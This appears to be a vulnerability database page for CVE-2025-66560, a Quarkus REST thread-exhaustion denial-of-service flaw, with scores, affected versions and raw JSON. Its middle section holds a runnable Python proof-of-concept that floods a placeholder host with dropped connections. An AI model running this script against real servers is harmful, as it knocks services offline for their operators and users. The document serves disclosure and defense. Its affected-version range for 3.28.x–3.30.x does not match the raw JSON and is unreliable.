Security Vulnerability Report
CVE-2025-66560 CVSS 5.9 MEDIUM

CVE-2025-66560

Published: 2026-01-07 18:15:52
Last Modified: 2026-02-03 16:40:29

Description

Quarkus is a Cloud Native, (Linux) Container First framework for writing Java applications. Prior to versions 3.31.0, 3.27.2, and 3.20.5, a vulnerability exists in the HTTP layer of Quarkus REST related to response handling. When a response is being written, the framework waits for previously written response chunks to be fully transmitted before proceeding. If the client connection is dropped during this waiting period, the associated worker thread is never released and becomes permanently blocked. Under sustained or repeated occurrences, this can exhaust the available worker threads, leading to degraded performance or complete unavailability of the application. This issue has been patched in versions 3.31.0, 3.27.2, and 3.20.5. A workaround involves implementing a health check that monitors the status and saturation of the worker thread pool to detect abnormal thread retention early.

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
Note: the raw record below also carries a Primary CVSS 3.1 metric rated 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H); the two assessments differ only in Attack Complexity (High vs. Low).
Weakness: CWE-770 (Allocation of Resources Without Limits or Throttling)

Configurations (Affected Products)

cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE (Quarkus REST < 3.20.5)
cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE (Quarkus REST 3.21.x - 3.27.1)
cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE (Quarkus REST 3.28.x - 3.30.x)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import threading
import time

# PoC for CVE-2025-66560 - Quarkus REST Thread Exhaustion DoS
# This script demonstrates how rapid connection drops can exhaust worker threads

TARGET_HOST = 'target-server.example.com'
TARGET_PORT = 8080
NUM_CONNECTIONS = 50  # Number of rapid connections to make
DELAY = 0.01          # Delay between connections in seconds


def attack_connection():
    """Establish a connection and drop it immediately to trigger thread blocking"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((TARGET_HOST, TARGET_PORT))
        # Send an HTTP request so the server starts producing a response
        sock.sendall(b'GET /api HTTP/1.1\r\nHost: ' + TARGET_HOST.encode() + b'\r\n\r\n')
        # Immediately close the connection before the response is sent
        sock.close()
    except Exception:
        # Connection errors are expected and deliberately ignored
        pass


def run_poc():
    print(f"[*] Starting DoS attack against {TARGET_HOST}:{TARGET_PORT}")
    print(f"[*] Launching {NUM_CONNECTIONS} rapid connections...")
    threads = []
    for _ in range(NUM_CONNECTIONS):
        t = threading.Thread(target=attack_connection)
        t.start()
        threads.append(t)
        time.sleep(DELAY)
    for t in threads:
        t.join()
    print("[*] Attack completed. Check server thread pool status.")


if __name__ == '__main__':
    run_poc()

References

https://github.com/quarkusio/quarkus/security/advisories/GHSA-5rfx-cp42-p624 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66560", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:52.023", "lastModified": "2026-02-03T16:40:28.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quarkus is a Cloud Native, (Linux) Container First framework for writing Java applications. Prior to versions 3.31.0, 3.27.2, and 3.20.5, a vulnerability exists in the HTTP layer of Quarkus REST related to response handling. When a response is being written, the framework waits for previously written response chunks to be fully transmitted before proceeding. If the client connection is dropped during this waiting period, the associated worker thread is never released and becomes permanently blocked. Under sustained or repeated occurrences, this can exhaust the available worker threads, leading to degraded performance, or complete unavailability of the application. This issue has been patched in versions 3.31.0, 3.27.2, and 3.20.5. A workaround involves implementing a health check that monitors the status and saturation of the worker thread pool to detect abnormal thread retention early."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", 
"integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.20.5", "matchCriteriaId": "015CA670-5F52-45CF-B627-3267A1C646DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.21.0", "versionEndExcluding": "3.27.2", "matchCriteriaId": "3691AA3B-570C-4770-B8AE-E97B6A3CFF35"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.30.0", "versionEndExcluding": "3.31.0", "matchCriteriaId": "32AFDCC2-2866-4586-AC70-97200C850B4B"}]}]}], "references": [{"url": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-5rfx-cp42-p624", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}